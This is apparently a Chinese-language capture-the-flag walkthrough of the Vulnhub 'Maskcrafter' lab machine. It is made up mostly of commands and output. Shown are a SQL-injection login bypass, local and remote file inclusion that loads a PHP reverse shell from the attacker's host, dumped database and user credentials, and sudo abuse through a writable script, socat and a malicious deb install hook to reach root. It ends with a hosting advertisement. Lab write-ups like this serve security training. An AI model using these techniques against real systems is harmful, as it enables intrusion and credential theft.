Maskcrafter
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:4c:3f:93 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:1c:48:cc 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000073s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
| 256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
|_ 256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/debug
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35771/tcp6 mountd
| 100005 1,2,3 35951/udp mountd
| 100005 1,2,3 47498/udp6 mountd
| 100005 1,2,3 50685/tcp mountd
| 100021 1,3,4 45195/tcp6 nlockmgr
| 100021 1,3,4 46199/tcp nlockmgr
| 100021 1,3,4 48207/udp6 nlockmgr
| 100021 1,3,4 53602/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
38041/tcp open mountd 1-3 (RPC #100005)
45351/tcp open mountd 1-3 (RPC #100005)
46199/tcp open nlockmgr 1-4 (RPC #100021)
50685/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 Welcome to maskcrafter(TM) FTP service.
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28847|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Mar 21 2020 .
drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||63424|)
150 Here comes the directory listing.
drwxr-xr-x 2 112 115 4096 Mar 30 2020 .
drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
-rw-r--r-- 1 0 0 430 Mar 30 2020 NOTES.txt
-rw-r--r-- 1 0 0 229 Mar 23 2020 cred.zip
226 Directory send OK.
ftp> get NOTES.txt
local: NOTES.txt remote: NOTES.txt
229 Entering Extended Passive Mode (|||15955|)
150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
100% |********************************************************************************| 430 273.03 KiB/s 00:00 ETA
226 Transfer complete.
430 bytes received in 00:00 (224.31 KiB/s)
ftp> get cred.zip
local: cred.zip remote: cred.zip
229 Entering Extended Passive Mode (|||30982|)
150 Opening BINARY mode data connection for cred.zip (229 bytes).
100% |********************************************************************************| 229 427.59 KiB/s 00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (197.90 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat NOTES.txt
Dear Web Administrator,
I've got a few points to make:
1.) Please choose a stronger password for /debug web-directory.
Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.
2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
Basically, we are hoping and praying that no hacker ever finds out about this.
Regards,
Root
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ls -alh
total 20K
drwxr-xr-x 2 kali kali 4.0K Apr 9 20:00 .
drwxr-xr-x 83 kali kali 4.0K Apr 9 19:54 ..
-rw-r--r-- 1 kali kali 229 Mar 23 2020 cred.zip
-rw-r--r-- 1 root root 2.7K Apr 9 19:59 nmap_full_scan
-rw-r--r-- 1 kali kali 430 Mar 29 2020 NOTES.txt
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive: cred.zip
[cred.zip] cred.txt password:
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ zip2john cred.zip > hashes
ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95
john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ showmount -e 192.168.56.254
Export list for 192.168.56.254:
目标主机没有NFS共享目录。
Kali Linux访问80端口,为用户登录界面,用admin’ or 1=1 — 即可轻松绕过。
登录成功后,在页面源代码中有注释:
This webpage was created out of urgency and as such some features are still buggy and may not work as intended.
DB connection ok.
Development in progress, please report any bugs to admin@covid19.localhost
Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!Employee page Welcome admin' or 1=1 -- !
Logout
访问注释中的链接。
访问下面的URL,返回的页面没有变化,但是注释参数page,可能存在本地文件包含漏洞
http://192.168.56.254/index.php?page=warning.php
http://192.168.56.254/index.php?page=../../../../../etc/passwd
访问上述URL得到:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin userx:x:1000:1000:userx:/home/userx:/bin/bash mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash
接着测试一下是否存在远程文件包含漏洞:
在Kali Linux启动http
http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt
得到返回:
jason,great
说明目标主机存在远程文件包含漏洞。
接下来在Kali Linux准备好php reverse文件,然后访问该文件从而得到shell
http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter] └─$ sudo nc -nlvp 5555 [sudo] password for kali: listening on [any] 5555 ... connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276 Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 08:15:22 up 17 min, 0 users, load average: 0.00, 0.00, 0.02 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ which python /usr/bin/python $ python -c 'import pty;pty.spawn("/bin/bash")' www-data@maskcrafter:/$
提权
www-data@maskcrafter:/var/www/html$ cat db.php cat db.php Connection failed -> " . mysqli_connect_error() . ""); } echo "This webpage was created out of urgency and as such some features are still buggy and may not work as intended.
"; echo ""; echo "DB connection ok."; echo "";
echo "
";
得到了数据库连接的用户名和密码
www-data@maskcrafter:/home$ mysql -uweb -p mysql -uweb -p Enter password: P@ssw0rdweb Welcome to the MySQL monitor. Commands end with ; or g. Your MySQL connection id is 59 Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or 'h' for help. Type 'c' to clear the current input statement. mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mydatabase | | mysql | | performance_schema | | phpmyadmin | | sys | +--------------------+ 6 rows in set (0.01 sec) mysql> use mydatabase; use mydatabase; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +----------------------+ | Tables_in_mydatabase | +----------------------+ | creds | | login | +----------------------+ 2 rows in set (0.00 sec) mysql> select * from creds; select * from creds; +----+--------------+-------------+ | id | data_type | password | +----+--------------+-------------+ | 1 | zip password | cred12345!! | +----+--------------+-------------+ 1 row in set (0.00 sec) mysql>
这应该是creds.zip的密码
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter] └─$ unzip cred.zip Archive: cred.zip [cred.zip] cred.txt password: extracting: cred.txt ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter] └─$ cat cred.txt userx:thisismypasswordforuserx2020
得到了userx的密码,切换shell到该用户。
userx@maskcrafter:~$ sudo -l sudo -l Matching Defaults entries for userx on maskcrafter: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User userx may run the following commands on maskcrafter: (evdaez) NOPASSWD: /scripts/whatsmyid.sh userx@maskcrafter:~$ ls -alh /scripts/whatsmyid.sh ls -alh /scripts/whatsmyid.sh -rwxr-xr-x 1 userx userx 15 Mar 30 2020 /scripts/whatsmyid.sh userx@maskcrafter:~$ cat /scripts/whatsmyid.sh cat /scripts/whatsmyid.sh #!/bin/bash id userx@maskcrafter:~$ echo '/bin/bash' >> /scripts/whatsmyid.sh echo '/bin/bash' >> /scripts/whatsmyid.sh
userx@maskcrafter:~$ sudo -u evdaez /scripts/whatsmyid.sh sudo -u evdaez /scripts/whatsmyid.sh uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez) bash: /home/userx/.bashrc: Permission denied evdaez@maskcrafter:~$ id id uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
成功切换到了用户evdaez
evdaez@maskcrafter:/home/evdaez$ sudo -l sudo -l Matching Defaults entries for evdaez on maskcrafter: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User evdaez may run the following commands on maskcrafter: (researcherx) NOPASSWD: /usr/bin/socat evdaez@maskcrafter:/home/evdaez$ sudo -u researcherx /usr/bin/socat stdin exec:/bin/sh
利用socat成功切换到了用户researcherx
cd /tmp TF=$(mktemp -d) echo 'exec /bin/sh' > $TF/x.sh fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF Doing `require 'backports'` is deprecated and will not load any backport in the next major release. Require just the needed backports instead, or 'backports/latest'. {:timestamp=>"2023-04-10T08:42:18.755150+0000", :message=>"Debian packaging tools generally labels all files in /etc as config files, as mandated by policy, so fpm defaults to this behavior for deb packages. You can disable this default behavior with --deb-no-default-config-files flag", :level=>:warn} {:timestamp=>"2023-04-10T08:42:18.786663+0000", :message=>"Created package", :path=>"x_1.0_all.deb"} sudo /usr/bin/dpkg -i x_1.0_all.deb (Reading database ... 96141 files and directories currently installed.) Preparing to unpack x_1.0_all.deb ... id uid=0(root) gid=0(root) groups=0(root) cd /root ls -alh total 88K drwx------ 9 root root 4.0K Mar 30 2020 . drwxr-xr-x 28 root root 4.0K Mar 30 2020 .. -rw-r--r-- 1 root root 39 Mar 20 2020 .bash_aliases lrwxrwxrwx 1 root root 9 Mar 20 2020 .bash_history -> /dev/null -rw-r--r-- 1 root root 3.1K Mar 20 2020 .bashrc drwx------ 2 root root 4.0K Mar 21 2020 .cache -rw-r--r-- 1 root root 22 Mar 20 2020 .gdbinit drwxr-xr-x 3 root root 4.0K Mar 20 2020 .gem drwx------ 3 root root 4.0K Mar 21 2020 .gnupg -rw------- 1 root root 38 Mar 20 2020 .lesshst drwxr-xr-x 3 root root 4.0K Mar 20 2020 .local drwxr-xr-x 4 root root 4.0K Mar 20 2020 peda -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 75 Mar 23 2020 root.txt -rw-r--r-- 1 root root 75 Mar 20 2020 .selected_editor drwx------ 2 root root 4.0K Mar 20 2020 .ssh drwxr-xr-x 2 root root 4.0K Mar 21 2020 .vim -rw------- 1 root root 20K Mar 30 2020 .viminfo -rw-r--r-- 1 root root 215 Mar 21 2020 .wget-hsts cat root.txt Congrats on finishing this VM... Please tweet me your walkthrough @evdaez
至此得到root shell以及root flag.
机房租用,北京机房托管,大带宽租用,IDC机房服务器主机租用托管-价格及服务咨询 www.e1idc.net